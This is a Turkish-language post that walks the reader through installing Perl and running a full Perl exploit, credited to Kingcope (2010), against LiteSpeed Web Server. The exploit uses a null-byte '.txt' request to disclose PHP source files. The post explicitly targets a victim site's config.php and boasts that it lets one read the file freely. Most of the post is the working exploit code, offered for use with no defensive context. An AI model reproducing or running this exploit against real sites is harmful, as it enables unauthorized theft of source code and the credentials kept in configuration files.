Exploiti Kullanman İçin Bilgisayarında Perl Yüklü Olmalıdır Strawberry Perl öneririm
Aşağıda Vereceğim Exploit Kodlarını lite.pl olarak kaydet ve C:\Perl\Bin Klasörüne At
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Gelen Ms-Dos Ekranına cd.. komutunu vererek C:\ dizinine kadar tekrarla C:\ ulaştıktan sonra
cd C:\perl\bin Yazıp Enter'la ve Sonra Exploit Kodumuzu Yazıyoruz
perl lite.pl www.hedefsitemiz.com config.php
bu komut sana doğrudan config.php dosyasının içeriğini verir :) yani rahatça okursun.
Exploit Kodları:
#!/usr/bin/perl # #LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit #By Kingcope #Google search: ""Proudly Served by LiteSpeed Web Server"" #June 2010 #Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556 # use IO::Socket; use strict; sub getphpsrc { my $host = shift; my $file = shift; if (substr($file, 0, 1) eq "/") { $file = substr($file, 1); } my $file2 = $file; $file2 =~ s/\//_/g; print "Saving source code of $file into $host-$file2\n"; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => '80', Proto => 'tcp') || die("Could not connect to $ARGV[0]"); print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n"; my $buf = ""; my $lpfound = 0; my $saveme = 0; my $savveme = 0; while(<$sock>) { if ($_ =~ /LiteSpeed/) { $lpfound = 1; } if ($saveme == 2) { $savveme = 1; } if ($saveme != 0 && $savveme == 0) { $saveme++; } if ($_ =~ /Content-Length:/) { $saveme = 1; } if ($savveme == 1) { $buf .= $_; } } if ($lpfound == 0) { print "This does not seem to be a LiteSpeed Webserver, saving file anyways.\n"; } open FILE, ">$host-$file2"; print FILE $buf; close FILE; print "Completed.\n"; } print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n"; print "By Kingcope\n"; print "June 2010\n\n"; if ($#ARGV != 1) { print "Usage: perl litespeed.pl \n"; print "Example: perl litespeed.pl www.thedomain.com index.php\n"; exit(0); } getphpsrc($ARGV[0], $ARGV[1]); print "Operation Completed :>.\n";
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